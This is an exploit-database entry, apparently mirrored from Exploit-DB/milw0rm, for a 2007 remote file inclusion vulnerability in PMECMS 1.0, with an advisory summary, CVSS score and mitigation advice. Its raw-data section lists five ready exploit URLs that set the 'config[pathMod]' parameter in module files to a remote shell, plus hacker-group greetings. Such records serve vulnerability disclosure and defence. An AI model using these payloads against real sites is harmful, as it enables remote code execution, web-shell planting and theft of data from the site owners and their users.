header-logo
Suggest Exploit
vendor:
PMECMS
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Multiple Remote File Inclusion
CWE
Product Name: PMECMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities

The PMECMS version 1.0 has multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by manipulating the 'config[pathMod]' parameter in various module files to include malicious files from remote servers. This can lead to remote code execution and unauthorized access to sensitive information.

Mitigation:

The vendor has not provided a patch for these vulnerabilities. Users are advised to upgrade to a newer version of PMECMS or implement a web application firewall to filter and block malicious requests.
Source

Exploit-DB raw data:

# PMECMS <= 1.0 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://www.pmecms.com/export/maj/PMECMS_Standard_os1.0.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/mod/image/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liens/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/liste/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/special/index.php?config[pathMod]=Shell
# Exploit:[Path]/mod/texte/index.php?config[pathMod]=Shell
# And More Download Script ......!!!
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-04]